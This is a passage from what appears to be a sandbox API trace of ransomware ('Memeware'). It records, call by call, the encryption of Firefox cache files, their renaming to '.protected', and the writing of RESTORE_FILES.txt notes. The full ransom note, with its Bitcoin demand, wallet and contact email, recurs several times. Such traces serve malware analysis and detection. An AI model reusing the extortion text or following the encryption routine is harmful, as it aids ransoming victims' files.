(lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\1\\C2\\0B619d01" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\1\\c2\\0b619d01"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\1\\C2\\0B619d01.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\1\\c2\\0b619d01.protected")) returned 1 [0086.160] FindNextFileW (in: hFindFile=0x47bb90, lpFindFileData=0x295de10 | out: lpFindFileData=0x295de10) returned 0 [0086.160] FindClose (in: hFindFile=0x47bb90 | out: hFindFile=0x47bb90) returned 1 [0086.160] wnsprintfW (in: pszDest=0xce0048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\1\\C2\\RESTORE_FILES.txt") returned 118 [0086.160] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\1\\C2\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\1\\c2\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x15c [0086.160] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0086.160] WriteFile (in: hFile=0x15c, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ddf4*=0x53d, lpOverlapped=0x0) returned 1 [0086.161] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0086.161] WriteFile (in: hFile=0x15c, 
lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ddf4*=0x2ac, lpOverlapped=0x0) returned 1 [0086.161] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0086.161] WriteFile (in: hFile=0x15c, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ddf4*=0xb1, lpOverlapped=0x0) returned 1 [0086.161] CloseHandle (hObject=0x15c) returned 1 [0086.161] FindNextFileW (in: hFindFile=0x47bb50, lpFindFileData=0x295e080 | out: lpFindFileData=0x295e080) returned 1 [0086.161] lstrcmpiW (lpString1="F6", lpString2="Windows") returned -1 [0086.161] lstrcmpiW (lpString1="F6", lpString2="Program Files") returned -1 [0086.161] lstrcmpiW (lpString1="F6", lpString2="Program Files (x86)") returned -1 [0086.161] lstrcmpiW (lpString1="F6", lpString2="$Recycle.bin") returned 1 [0086.161] lstrcmpiW (lpString1="F6", lpString2="System Volume Information") returned -1 [0086.161] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\1\\F6") returned 100 [0086.161] lstrcmpW (lpString1="F6", lpString2=".") returned 1 [0086.161] lstrcmpW (lpString1="F6", lpString2="..") returned 1 [0086.161] wnsprintfW (in: pszDest=0xce0048, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\1\\F6\\*") returned 102 [0086.161] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\1\\F6\\*", lpFindFileData=0x295de10 | out: 
lpFindFileData=0x295de10) returned 0x47bb90 [0086.162] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0086.162] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0086.162] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0086.162] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0086.162] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0086.162] wnsprintfW (in: pszDest=0xce0048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\1\\F6\\.") returned 102 [0086.162] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0086.162] FindNextFileW (in: hFindFile=0x47bb90, lpFindFileData=0x295de10 | out: lpFindFileData=0x295de10) returned 1 [0086.162] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0086.162] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0086.162] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0086.162] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0086.162] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0086.162] wnsprintfW (in: pszDest=0xce0048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\1\\F6\\..") returned 103 [0086.162] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0086.162] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0086.162] FindNextFileW (in: hFindFile=0x47bb90, lpFindFileData=0x295de10 | out: lpFindFileData=0x295de10) returned 1 [0086.162] lstrcmpiW (lpString1="CBD4Dd01", lpString2="Windows") returned -1 [0086.162] lstrcmpiW (lpString1="CBD4Dd01", lpString2="Program Files") returned -1 [0086.162] lstrcmpiW (lpString1="CBD4Dd01", lpString2="Program Files (x86)") returned -1 [0086.162] lstrcmpiW (lpString1="CBD4Dd01", 
lpString2="$Recycle.bin") returned 1 [0086.162] lstrcmpiW (lpString1="CBD4Dd01", lpString2="System Volume Information") returned -1 [0086.162] wnsprintfW (in: pszDest=0xce0048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\1\\F6\\CBD4Dd01") returned 109 [0086.162] StrStrIW (lpFirst="CBD4Dd01", lpSrch=".protected") returned 0x0 [0086.162] lstrcmpW (lpString1="CBD4Dd01", lpString2="RESTORE_FILES.txt") returned -1 [0086.162] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ddac | out: pbBuffer=0x295ddac) returned 1 [0086.162] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ddd4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ddd4*=0x30) returned 1 [0086.162] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\1\\F6\\CBD4Dd01" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\1\\f6\\cbd4dd01"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x160 [0086.163] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\1\\F6\\CBD4Dd01") returned 109 [0086.163] StrStrW (lpFirst="CBD4Dd01", lpSrch=".txt") returned 0x0 [0086.163] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\1\\F6\\CBD4Dd01") returned 109 [0086.163] StrStrW (lpFirst="CBD4Dd01", lpSrch=".rar") returned 0x0 [0086.163] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\1\\F6\\CBD4Dd01") returned 109 [0086.163] StrStrW (lpFirst="CBD4Dd01", 
lpSrch=".zip") returned 0x0 [0086.163] ReadFile (in: hFile=0x160, lpBuffer=0xcf0090, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0xcf0090*, lpNumberOfBytesRead=0x295ddf4*=0x2800, lpOverlapped=0x0) returned 1 [0086.168] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0086.169] WriteFile (in: hFile=0x160, lpBuffer=0xcf0090*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0xcf0090*, lpNumberOfBytesWritten=0x295ddf4*=0x2800, lpOverlapped=0x0) returned 1 [0086.169] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0086.169] WriteFile (in: hFile=0x160, lpBuffer=0x295ddcc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0x295ddcc*, lpNumberOfBytesWritten=0x295ddf4*=0x4, lpOverlapped=0x0) returned 1 [0086.169] WriteFile (in: hFile=0x160, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ddf4*=0x30, lpOverlapped=0x0) returned 1 [0086.169] CloseHandle (hObject=0x160) returned 1 [0086.169] wnsprintfW (in: pszDest=0xcf0090, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\1\\F6\\CBD4Dd01.protected") returned 119 [0086.169] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\1\\F6\\CBD4Dd01" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\1\\f6\\cbd4dd01"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\1\\F6\\CBD4Dd01.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\1\\f6\\cbd4dd01.protected")) returned 1 [0086.170] FindNextFileW (in: hFindFile=0x47bb90, lpFindFileData=0x295de10 | out: lpFindFileData=0x295de10) returned 0 [0086.170] FindClose (in: hFindFile=0x47bb90 | out: hFindFile=0x47bb90) returned 1 [0086.170] wnsprintfW (in: pszDest=0xce0048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\1\\F6\\RESTORE_FILES.txt") returned 118 [0086.170] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\1\\F6\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\1\\f6\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x15c [0086.171] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0086.171] WriteFile (in: hFile=0x15c, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ddf4*=0x53d, lpOverlapped=0x0) returned 1 [0086.172] lstrlenA (lpString="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") returned 684 [0086.172] WriteFile (in: hFile=0x15c, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ddf4*=0x2ac, lpOverlapped=0x0) returned 1 [0086.172] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0086.172] WriteFile (in: hFile=0x15c, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ddf4*=0xb1, 
lpOverlapped=0x0) returned 1 [0086.172] CloseHandle (hObject=0x15c) returned 1 [0086.172] FindNextFileW (in: hFindFile=0x47bb50, lpFindFileData=0x295e080 | out: lpFindFileData=0x295e080) returned 0 [0086.172] FindClose (in: hFindFile=0x47bb50 | out: hFindFile=0x47bb50) returned 1 [0086.172] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\1\\RESTORE_FILES.txt") returned 115 [0086.172] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\1\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\1\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0086.173] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0086.173] WriteFile (in: hFile=0x158, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295e064, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295e064*=0x53d, lpOverlapped=0x0) returned 1 [0086.173] lstrlenA (lpString="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") returned 684 [0086.173] WriteFile (in: hFile=0x158, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295e064, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295e064*=0x2ac, lpOverlapped=0x0) returned 1 [0086.174] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0086.174] WriteFile (in: hFile=0x158, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295e064, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295e064*=0xb1, 
lpOverlapped=0x0) returned 1 [0086.174] CloseHandle (hObject=0x158) returned 1 [0086.175] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 1 [0086.175] lstrcmpiW (lpString1="2", lpString2="Windows") returned -1 [0086.175] lstrcmpiW (lpString1="2", lpString2="Program Files") returned -1 [0086.175] lstrcmpiW (lpString1="2", lpString2="Program Files (x86)") returned -1 [0086.175] lstrcmpiW (lpString1="2", lpString2="$Recycle.bin") returned 1 [0086.175] lstrcmpiW (lpString1="2", lpString2="System Volume Information") returned -1 [0086.175] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\2") returned 97 [0086.175] lstrcmpW (lpString1="2", lpString2=".") returned 1 [0086.175] lstrcmpW (lpString1="2", lpString2="..") returned 1 [0086.175] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\2\\*") returned 99 [0086.176] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\2\\*", lpFindFileData=0x295e080 | out: lpFindFileData=0x295e080) returned 0x47bb50 [0086.176] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0086.177] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0086.177] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0086.177] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0086.177] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0086.177] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\2\\.") returned 99 
[0086.177] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0086.177] FindNextFileW (in: hFindFile=0x47bb50, lpFindFileData=0x295e080 | out: lpFindFileData=0x295e080) returned 1 [0086.177] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0086.177] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0086.177] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0086.177] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0086.177] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0086.177] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\2\\..") returned 100 [0086.177] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0086.177] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0086.177] FindNextFileW (in: hFindFile=0x47bb50, lpFindFileData=0x295e080 | out: lpFindFileData=0x295e080) returned 0 [0086.177] FindClose (in: hFindFile=0x47bb50 | out: hFindFile=0x47bb50) returned 1 [0086.177] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\2\\RESTORE_FILES.txt") returned 115 [0086.177] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\2\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\2\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0086.178] lstrlenA (lpString="! 
SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0086.178] WriteFile (in: hFile=0x158, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295e064, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295e064*=0x53d, lpOverlapped=0x0) returned 1 [0086.179] lstrlenA 
(lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0086.179] WriteFile (in: hFile=0x158, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295e064, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295e064*=0x2ac, lpOverlapped=0x0) returned 1 [0086.179] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0086.179] WriteFile (in: hFile=0x158, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295e064, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295e064*=0xb1, lpOverlapped=0x0) returned 1 [0086.179] CloseHandle (hObject=0x158) returned 1 [0086.179] FindNextFileW (in: hFindFile=0x47bb10, 